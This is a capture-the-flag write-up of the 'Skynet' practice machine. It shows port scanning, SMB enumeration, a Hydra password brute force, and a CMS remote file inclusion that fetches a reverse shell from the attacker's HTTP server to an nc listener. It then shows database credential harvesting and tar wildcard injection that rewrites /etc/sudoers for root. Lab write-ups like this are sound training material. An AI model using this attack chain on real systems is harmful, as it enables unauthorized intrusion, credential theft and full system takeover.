Skynet - Writeup
Dec 17, 2021
Skynet Writeup
Nmap Scan :
First we begin with an Nmap scan
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP SASL AUTH-RESP-CODE PIPELINING UIDL CAPA
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 have post-login listed LOGIN-REFERRALS Pre-login SASL-IR LITERAL+ ID capabilities ENABLE OK LOGINDISABLEDA0001 IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2021-12-14T21:08:03
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-12-14T15:08:03-06:00
Looks like we got a webserver running on port 80, let’s check for hidden directories:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ ffuf -c -u http://10.10.221.221/FUZZ -w ~/Documents/wordlists/common.txt
:: Method : GET
:: URL : http://10.10.221.221/FUZZ
:: Wordlist : FUZZ: /home/bvr0n/Documents/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
admin [Status: 301, Size: 314, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10]
[Status: 200, Size: 523, Words: 26, Lines: 19]
.hta [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10]
config [Status: 301, Size: 315, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
index.html [Status: 200, Size: 523, Words: 26, Lines: 19]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
squirrelmail [Status: 301, Size: 321, Words: 20, Lines: 10]
After checking each directory, the squirrelmail seems intresting.
Looks like there is a redirection to http://10.10.221.221/squirrelmail/src/login.php, we need creds, i remember that SMB is running from the nmap scan, let’s check it:
SMB Enum :
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ smbclient -L //10.10.221.221
Enter WORKGROUP\bvr0n's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Let’s see the anonymous share:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ smbclient //10.10.221.221/anonymous
Enter WORKGROUP\bvr0n's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831012 blocks available
smb: \> get attention.txt
smb: \> cd logs\
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt
attention.txt had this inside:
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
log1.txt had a list of password, you got it right!!!! Brute forcing time:
Fire up burpsuite to grabe the request:
login_username=test&secretkey=test&js_autodetect_results=1&just_logged_in=1
Now let’s Hydra:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ hydra -l ** 10.10.46.34 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect" -P log1.txt
[DATA] attacking http-post-form://10.10.46.34:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect
[80][http-post-form] host: 10.10.46.34 login: milesdyson password: **
And we have now a password, let’s login and check his email.
After we login, we see an email with this inside:
We have changed your smb password after system malfunction.
Password: **
Now let’s check that milesdyson SMB share:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ smbclient -U "**" //10.10.46.34/milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5831036 blocks available
smb: \> cd notes/
Inside the notes/ directory, there is a file named important.txt:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ cat important.txt
1. Add features to beta CMS /**
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$
Now we have his hidden directory, let’s navigate to it.
After checking i didn’t find anything intresting, so i decided to brute force the directories:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ ffuf -c -u http://10.10.46.34/**/FUZZ -w ~/Documents/wordlists/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.46.34/**/FUZZ
:: Wordlist : FUZZ: /home/bvr0n/Documents/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
.htaccess [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta [Status: 403, Size: 276, Words: 20, Lines: 10]
administrator [Status: 301, Size: 335, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 276, Words: 20, Lines: 10]
[Status: 200, Size: 418, Words: 45, Lines: 16]
index.html [Status: 200, Size: 418, Words: 45, Lines: 16]
The administrator takes you to a CMS, searching the name in exploit-db will lead you to an RFI
Testing it on the /etc/passwd with this http://10.10.46.34/**/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
works.
==> Everything you need to know about RFI
Let’s not waste any time and get a reverse shell.
First, you need to start a python http server in the directory that contains the reverse shell:
┌──(bvr0n㉿fsociety)-[~/ctf/thm/skynet]
└─$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Start a nc listener and request the reverse shell:
http://10.10.46.34/**/administrator/alerts/alertConfigField.php?urlConfig=http://IP:8000/reverse.php
┌──(bvr0n㉿fsociety)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [**] from (UNKNOWN) [10.10.46.34] 50750
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
12:12:58 up 45 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Privilege Escalation :
First thing i checked, is for services that are runnig internally:
www-data@skynet:/var/www/html/**/administrator$ netstat -tanup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143
Looks like MySQL is running, let’s look for any configuration file.
www-data@skynet:/var/www/html/**/administrator$ ls
Configuration.php alerts classes components index.php js media templates
php data@skynet:/var/www/html/45kra24zxs28v3yd/administrator$ cat Configuration.p
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "password123";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
We got MySQL creds, let’s login to that database:
www-data@skynet:/var/www/html/**/administrator$ mysql -u root -p
Enter password:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cuppa |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.01 sec)
mysql> use cuppa;
mysql> show tables;
+--------------------------+
| Tables_in_cuppa |
+--------------------------+
| cu_articles |
| cu_categories |
| cu_menu_item_type |
| cu_menu_items |
| cu_menu_items_extra_data |
| cu_menus |
| cu_permissions |
| cu_tables |
| cu_user_groups |
| cu_users |
+--------------------------+
10 rows in set (0.00 sec)
mysql> desc cu_users;
+---------------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+--------------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(45) | NO | | NULL | |
| email | varchar(45) | NO | | NULL | |
| username | varchar(45) | NO | | NULL | |
| password | varchar(250) | NO | | NULL | |
| enabled | int(11) | NO | | 1 | |
| user_group_id | int(11) | NO | MUL | NULL | |
+---------------+--------------+------+-----+---------+----------------+
7 rows in set (0.00 sec)
mysql> select username,password from cu_sers;
ERROR 1146 (42S02): Table 'cuppa.cu_sers' doesn't exist
mysql> select username,password from cu_users;
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | b686468aec2c71e1783375763dca9b7e |
+----------+----------------------------------+
After spending some time trying to decrypt that hash, i found myself into a rabbit hole.
I uploaded LinPeas, and i actually found a way to escalate privliges:
*/1 * * * * root /home/milesdyson/backups/backup.sh
There is a cronjob running the backup.sh, if you check that file, you’ll see that we can exploit the Tar WildCard, Here’s a writeup explaining in details
Executing these commands will get you to root:
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > rev.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh rev.sh"
echo "/var/www/html" > --checkpoint=1
If we check after a minute, we’ll see that www-data can run sudo with no password:
www-data@skynet:/var/www/html$ sudo -l
User www-data may run the following commands on skynet:
(root) NOPASSWD: ALL
www-data@skynet:/var/www/html$ sudo su
root@skynet:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@skynet:/var/www/html#
Best Regards